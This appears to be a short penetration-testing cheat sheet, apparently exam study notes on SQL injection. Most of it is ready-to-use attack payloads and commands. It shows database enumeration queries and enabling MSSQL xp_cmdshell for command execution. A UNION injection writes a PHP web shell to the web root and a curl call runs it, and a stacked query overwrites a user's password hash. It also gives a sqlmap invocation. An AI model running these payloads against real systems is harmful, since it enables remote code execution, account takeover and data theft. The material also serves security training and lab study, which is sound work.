SQL Injection
SQL Enumeration
- System user:
select system_user() - Version:
select version()/SELECT @@version; - Other users (MySQL):
SELECT * FROM mysql.user - Table names (MSSQL):
SELECT name FROM sys.databases;
Connect to MSSQL with impacket (Windows Auth):
impacket-mssqlclient $USERNAME:$PASSWORD@$IP -windows-auth
Enable xp_cmdshell (MSSQL) - RCE:
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
UNION BASED SQLI + PHP RCE (MySQL):
' UNION SELECT '<?php system($_GET["cmd"]);?>', null, null, null, null INTO OUTFILE '/var/www/html/tmp/webshell.php' -- //
- adjust null based on number of fetched results
curl http://IP/tmp/webshell.php?cmd=id
Update records of login portal (stacked queries):
'; update users set password_hash = '6183c9c42758fa0e16509b384e2c92c8a21263afa49e057609e3a7fb0e8e5ebb' where username = 'butch';--
SHA2 of password "tacos123"
SQLMAP
not allowed for exam
sqlmap -u URL --data "POST_DATA" [--technique TECHNIQUES -p PARAMETER_THAT_IS_INJECTABLE]